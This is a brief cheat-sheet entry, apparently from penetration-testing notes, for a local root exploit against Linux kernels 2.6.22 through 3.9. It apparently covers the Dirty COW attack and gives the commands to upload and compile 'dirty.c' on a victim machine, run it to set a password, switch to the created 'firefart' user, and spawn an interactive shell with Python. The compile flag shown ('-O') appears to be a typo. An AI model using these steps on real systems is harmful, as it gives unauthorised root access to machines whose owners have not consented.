Exploit: Linux Kernel 2.6.22 < 3.9
➤ 1. Upload the exploit on the victim
➤ 2. Compile the exploit
gcc -pthread dirty.c -O dirty -lcrypt
chmod +x dirty
➤ 3. exploit it
./dirty
Please enter the new password: lexiswashere
➤ 4. Privesc
su firefart
Password: lexiswashere
Note: if the 'su : must be run from a terminal' error appear, upgrade tty
python -c 'import pty; pty.spawn("/bin/sh")'